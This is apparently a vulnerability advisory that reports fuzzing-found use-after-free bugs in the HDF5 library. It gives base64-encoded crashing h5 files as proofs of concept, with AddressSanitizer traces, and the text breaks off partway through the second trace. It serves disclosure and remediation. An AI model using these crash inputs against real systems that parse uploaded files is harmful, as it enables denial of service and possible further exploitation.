HDF5 - Multiple Memory Corruption Vulnerabilities

Sep 20 2023

Pulse Security briefly assessed the HDF5 library (hdf5-1.14.1-2) for memory corruption vulnerabilities as part of a client engagement where the HDF5 library was used to parse potentially untrusted data. Multiple memory corruption issues were found in the HDF5 library by fuzz testing the h5stat and h5dump helper utilities.

Roughly 1 billion test cases were executed using AFL++ and test cases available in the HDF5 source repository as starting inputs. This resulted in 15 unique memory corruption vulnerabilities as determined by a major stack hash when the respective segmentation faults occurred. An input corpus generated by fuzzing h5stat was subsequently used to fuzz the h5dump utility, which uses more of the HDF5 library’s logic. 89 unique memory corruption issues were discovered in h5dump after executing approximately 10 million fuzzed test cases.

The input corpus and crashing testcases are included at the end of this advisory. Further memory corruption issues likely exist in HDF5, and the fuzz testing did not achieve complete coverage over the library’s code base. Integration with oss-fuzz was suggested to the HDF5 project.

Further research regarding practical exploitability of these vulnerabilities against a modern operating system were not performed. The exploitability classifications in this advisory are based on rudimentary analysis of the crashing condition and verbatim output from the GDB exploitable plugin. For example, null pointer de-references are less likely to be exploitable than a write-based heap overflow. This was included to help prioritise remediation and is not intended to provide commentary around the realistic practical exploitability of each crashing test case. Remediation of all memory corruption issues is recommended wherever possible, even without evidence of a weaponised exploit.

Where HDF5 is used to process user-supplied data in a server-side application, such as a mechanism that allows users to upload h5 files, these memory corruption vulnerabilities may be used to trigger a denial of service condition. Further exploit development may allow for remote code execution under this scenario.

The tables and summaries below were sent to the HDFGroup, and the five specific memory corruption issues reported via the newly setup GitHub security advisory page. All testcases and input corpora were provided to HDFGroup. These vulnerabilities remain unresolved in HDF5 at the time of this advisory release.

Use After Free

Summary

An attacker who can control an h5 file parsed by HDF5 can trigger a heap use-after-free conditions. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the use-after-free bugs against modern operating systems.

Impact

An attacker who can control an h5 file or other hdf5 data parsed by a target system can trigger the use-after-free. With the proof-of-concepts below, this could result in denial-of-service conditions in server-side implementations of the HDF5 library.

Use-after-free vulnerabilities may result in remote code execution, depending on the specific exploitability of the vulnerability. Real-world exploitability of this issue in terms of remote-code execution is currently unknown.

H5T__conv_f_f Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object was allocated, freed and subsequently used in a READ operation from H5T__conv_f_f.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "H4sIAAAAAAAAA7VVPWzTUBA+5w8nFHBApAEVxUgsbAlNELA820pKykArCjNNk6IuIGHowIQZ2RAM/EkMDLCyARuKhDAbCys/EhEdqZAQQghz771zYpPEjhB8st/Lvee7797du8v1Zn1uW25vDjhUFVKgQRIG8AhFNSgb/f1nCYhEs2Eu8rlMsk6zk4nWO32q0QBQ+vwSnzx//0hazmqkFcc/xddotv8ML/4TxEc+5OFqYMntQse1eD62jDO9qYxadmg2xFiMohWfZt9hdCfykpAOSZoYn1BO18glhdb/BiNPBTyN+/H1fiiQACU1uE955FIwgndIXh6yl+E2Vd+wFuOzosi0/SL97bR+qIyoVY5WatVqreKhwaIwqSSkge9UPLygdOihiRtkwcB304/xa9YQMyYYXIvXUFqQu2ZMXILoSYf/Ab4w05ntu7N4LQm3xLrD5P4HZt0f7Jdvz4Is+wfGGYG37PAfx5Fh0ExjDGO+9JPbN+/d5RgfDmn/JZvz9/e5Fv+VAQcvrGbdPDCPT5cd9/dFvbyneqlbku0FawodaZ+nXPYNx5p5dRGfp2ye9HcSf1bIDy3p33N2IuDfQWw/SycX6gp66PefjZg+6CMbFLDmPgdEecN2hRWcyeyGsJGM/4bwhtUF8aOulHtDfSAXkiY85hB2xOybtt26snBu6bK93l5Zt1cv0bp/vf1OkoRlXppQoNpvnb3QOr8az69holAF+4QOK6STgj2ROvyOzpQLwJmmVDiGnflxW+hq0Inhy+uM7oYB1a1Q240p6RDvUFcshcUCBnkK5/Zayx55PGc0J785PDYtHsuAYgrCbSLxLUxc1UuCj59zWoVp/g/0GzjDVA8YCAAA" | base64 -d | gunzip -c > f73304be7d3e45624d4f6651c0688b35 
$ ./hdf5/bin/h5dump f73304be7d3e45624d4f6651c0688b35 
HDF5 "f73304be7d3e45624d4f6651c0688b35" {
GROUP "/" {
   DATASET "ArrayOfStrucbures" {
      DATATYPE  H5T_COMPOUND {
         32-bit little-endian integer 32-bit precision "a_name";
         11632864-bit big-endian floating-point 32-bit precision "b_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [62978] undefined bitfield } "array_name";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1235==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f0561b9b887 at pc 0x7f056ae87b34 bp 0x7ffda79b4e10 sp 0x7ffda79b4e08
READ of size 1 at 0x7f0561b9b887 thread T0
    #0 0x7f056ae87b33 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428
    #1 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #2 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #3 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #4 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #5 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #6 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #7 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #8 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #9 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #10 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #11 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #12 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #13 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #14 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #15 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #16 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #18 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #19 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #20 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #21 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #22 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #23 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #24 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #25 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #26 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #27 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #28 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #29 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #30 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #31 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #32 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #33 0x55f688391649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f0561b9b887 is located 565383 bytes inside of 1454108-byte region [0x7f0561b11800,0x7f0561c7481c)
freed by thread T0 here:
    #0 0x7f056b38fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7f056ae8711a in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4848
    #2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

previously allocated by thread T0 here:
    #0 0x7f056b390037 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154
    #1 0x7f056ae85a86 in H5T__conv_f_f /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4388
    #2 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f056ae79489 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2308
    #4 0x7f056ae4687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f056aa28b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f056a9e6221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f056aa1c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f056afd1ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f056afa1afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f056afa1afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f056a990a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f056a998444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x55f6883c946c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x55f6883de18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x55f688397c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x55f6883a0947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f056ab7b14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f056ab8c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f056a906721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f056a90a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f056ab9ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f056ab933d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f056ab7dd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f056ac35c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f056afdd455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f056afb4095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f056afb4095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f056ac2161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f056ac2161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x55f688396be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x55f68838f1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f056a538d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)

SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
Shadow bytes around the buggy address:
  0x0fe12c36b6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fe12c36b710:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b730: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b740: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0fe12c36b760: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1235==ABORTING

H5T__conv_struct_opt Use After Free

Details

The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct_opt. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.

PoC

The following PoC shows the ASAN output detailing the use-after-free condition.

$ echo "H4sIAAAAAAAAA+v0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcCD4DAxNcfgcTkmIGFA4YeLg6BoBoAyhfAUo3sGEoRQEhQa6uDAyMcPthACZvwQqhOfAbA/PFZ6KU4QTMhJVQA6SAiHr62EUEUBhoB+ABjMC0xsiCcKMgMN0yAukZUH4Chno2kDwHWBEQCAAhCGyApsMMRpg6iDgjlP8Pqp8PKm5kAASmhpaGpiYmpoYgAyXARjIyQTT8gCYVUIaCuG0C+Z5ci1/6KWEToL7AkjFRwAd7xwZjIH3iEBA7BTQyQzU22EPkH9g7zUbIG0w3hhrY4BAKBlftncF8iDxIDhIMAo4Q/RfsXZDkQUHOAtHvOGsmCJy0d0XTD8ne5o4Q84/au0HkG0DyIBYk2gScJql4AtEhe3eY/pQTTiC72cF8FyeI/QfsPdDsh5QbDU4yCoUyxwv32Hui2c8J5i9ygrhvp70XkrwmsPgJ9vN3YQSGEqz8eUEghMkGDTQylwTw/w0ZmuRQufwElDsWFSVW+qcFlxSVJpeUFqUWQ8VhCVgASjMzJICzphg07yfG5yXmpqIpxgIEOGBpToEhF6qHhYCbBBXk4XrEORjEQSVzMlQvoXpHUMEeqsaBwYSbwVQUmChToHoF0BXLo7iUQQyYlniAdHJGYhGy9wgBYQZIECSCwhJJIwswEYHEW+AA0588MH/W/wf7EwBLcXcCGAgAAA==" | base64 -d | gunzip -c > 77d3cad25d20e9298344223c8d2d0eaa
$ ./hdf5/bin/h5dump 77d3cad25d20e9298344223c8d2d0eaa 
HDF5 "77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
   DATASET "ArrayOfStructures" {
      DATATYPE  H5T_COMPOUND {
         H5T_STD_I32LE "a_name";
         H5T_IEEE_F32LE "m_name";
         64-bit little-endian floating-point 64-bit precision "c_name";
         H5T_COMPOUND {
            H5T_STRING {
               STRSIZE 1;
               STRPAD H5T_STR_NULLTERM;
               CSET H5T_CSET_ASCII;
               CTYPE H5T_C_S1;
            } "char_name";
            H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit precision } "array_name";
         } "d_name";
      }
      DATASPACE  SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1205==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f790a85081c at pc 0x7f7910e96541 bp 0x7fff5e17aea0 sp 0x7fff5e17a650
READ of size 407088 at 0x7f790a85081c thread T0
    #0 0x7f7910e96540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
    #1 0x7f79109f1b7f in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
    #2 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #3 0x7f79109f2171 in H5T__conv_struct_opt /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
    #4 0x7f79109bd87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
    #5 0x7f791059fb3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
    #6 0x7f791055d221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
    #7 0x7f79105935d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
    #8 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #9 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #10 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #11 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #12 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #13 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #14 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #15 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #16 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #17 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #18 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #19 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #20 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #21 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #22 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #23 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #24 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
    #25 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
    #26 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
    #27 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
    #28 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
    #29 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
    #30 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
    #31 0x558ffe8e2be4  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
    #32 0x558ffe8db1c7  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
    #33 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
    #34 0x558ffe8dd649  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)

0x7f790a865808 is located 0 bytes to the right of 1048584-byte region [0x7f790a765800,0x7f790a865808)
freed by thread T0 here:
    #0 0x7f7910f06b6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
    #1 0x7f79106aed3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
    #2 0x7f79106b0b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
    #3 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
    #4 0x7f7910591aa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
    #5 0x7f7910591aa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
    #6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
    #7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
    #8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
    #9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
    #10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
    #11 0x558ffe91546c  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
    #12 0x558ffe92a18d  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
    #13 0x558ffe8e3c9f  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
    #14 0x558ffe8ec947  (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
    #15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
    #16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
    #17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
    #18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
    #19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
    #20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
    #21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
    #22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
